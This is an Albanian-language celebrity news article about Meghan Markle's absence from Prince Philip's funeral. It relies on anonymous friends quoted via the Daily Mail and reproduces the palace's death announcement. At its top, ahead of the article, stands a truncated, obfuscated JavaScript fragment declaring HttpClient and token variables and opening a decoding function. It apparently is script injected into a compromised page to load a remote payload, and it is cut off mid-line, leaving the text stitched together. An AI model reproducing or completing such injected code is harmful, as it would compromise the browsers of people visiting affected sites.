;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Meghan Markle nuk ishte në funeralin e Princit Philip – Pse?

By

Princi Harry udhëtoi disa ditë më parë drejt Pallatit Mbretëror për të qenë pranë familjes së tij në ceremoninë mortore për Princin Philip. Ai mbërriti në 11 prill në Britaninë e Madhe, për herë të parë që pas largimit me Meghan Markle.

Ndërkohë kjo e fundit nuk e shoqëroi Harry-n dhe u tha se mjeku i ka ndaluar udhëtimet për shkak të shtatzënisë. Kështu, Meghan nuk do të jetë e pranishme për t’i dhënë lamtumirën e fundit Princit Phlip, por miqtë e saj thonë se ka dhe një tjetër arsye pas këtij vendimi.

Miqtë e ish-aktores kanë treguar se ajo nuk dëshiron që jetë qendra e vëmendjes dhe ndaj ka vendosur të mos jetë e pranishme në ceremoni. Megjithatë të njëjtët persona janë shprehur se Meghan ka pasur një lidhje shumë speciale me Princin Philip dhe se ajo e adhuronte si njeri.

“Meghan tha se meraku i saj më i madh për momentin është mbështetja për Harry-n. Ajo tha se ja la atij në dorë të vendoste nëse duhej të merrte pjesë apo jo në funeralin e gjyshit. Meghan tha se tashmë është koha që familja të bashkohet dhe të lërë mënjanë pakënaqësitë. Ajo është shprehur se këtë gjë do të dëshironte edhe Princi Philip dhe se është e gatshme të falë dhe të vazhdojë përpara”, ka thënë një burim pranë Meghan për “Daily Mail”.

Kujtojmë se Princi Philip u nda nga jeta në datë 9 prill, pasi qëndroi disa ditë më parë i shtruar në spital. Lajmin e hidhur e bëri të ditur Pallati Mbretëror në një deklaratë zyrtare ku shkruhej:

“Me hidhërim të thellë, Madhëria e saj Mbretëresha njofton vdekjen e burrit të saj të dashur, Lartmadhërisë së Tij Mbretërore Princit Philip, Dukës së Edinburgut. Lartësia e Tij ndërroi jetë paqësisht këtë mëngjes në Kështjellën e Windsor. Familja Mbretërore bashkohet me njerëz në të gjithë botën për të mbajtur zi për humbjen e tij. Njoftimet e mëtejshme do të bëhen në momentin e duhur.”

Artikuj të ngjashëm